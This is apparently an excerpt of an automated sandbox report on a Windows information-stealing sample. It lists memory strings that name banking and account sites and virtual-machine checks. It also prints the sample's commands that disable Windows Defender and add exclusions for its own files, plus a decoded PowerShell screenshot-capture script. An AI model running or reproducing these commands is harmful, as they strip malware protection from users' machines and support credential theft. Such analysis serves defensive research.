              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
              Source: getmac.exe, 0000004F.00000003.1514289207.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000002.1515569310.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514721736.00000284F69A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696503903o
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
              Source: getmac.exe, 0000004F.00000003.1514289207.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514657123.00000284F69BE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000002.1515569310.00000284F69C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport!
              Source: getmac.exe, 0000004F.00000002.1515569310.00000284F698F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514721736.00000284F698E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514289207.00000284F698C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"t"
              Source: getmac.exe, 0000004F.00000003.1514721736.00000284F698E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514289207.00000284F698C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V{
              Source: sppawx.exe, 00000002.00000003.1325460441.0000018C014F3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514289207.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000002.1515569310.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514721736.00000284F69A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: d2qemu-ga
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696503903t
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696503903s
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696503903j
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696503903f
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: getmac.exe, 0000004F.00000003.1514289207.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000002.1515569310.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514721736.00000284F69A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWRoot%\system32\d
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
              Source: getmac.exe, 0000004F.00000003.1514721736.00000284F698E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514289207.00000284F698C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696503903x
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ($9CSf8vmusrvc
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696503903
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696503903
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696503903
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696503903
              Source: sppawx.exe, 00000002.00000003.1517272348.0000018C7F6B9000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1518449163.0000018C01588000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1518449163.0000018C0167C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748973373.0000018C7F6BA000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1502382120.0000018C0167C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: sppawx.exe, 00000002.00000002.1744930553.0000018C014AB000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1325460441.0000018C014F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: hfecodevmware
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696503903t
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: hofecodevmsrvc
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
              Source: getmac.exe, 0000004F.00000003.1514289207.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514657123.00000284F69BE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000002.1515569310.00000284F69C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A31D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79A31D19C
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCCB7200 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FFEDCCB7200
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3334F0 GetProcessHeap,0_2_00007FF79A3334F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A31D37C SetUnhandledExceptionFilter,0_2_00007FF79A31D37C
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A31D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79A31D19C
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A31C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF79A31C910
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A32A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79A32A684
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A31D37C SetUnhandledExceptionFilter,2_2_00007FF79A31D37C
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A31D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF79A31D19C
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A31C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF79A31C910
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A32A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF79A32A684
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCC6DA5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFEDCC6DA5C
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD2330E8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDD2330E8
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD273398 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFEDD273398
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF62570B6D8 SetUnhandledExceptionFilter,103_2_00007FF62570B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF62570A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,103_2_00007FF62570A66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF62570B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,103_2_00007FF62570B52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF625714C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,103_2_00007FF625714C10

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
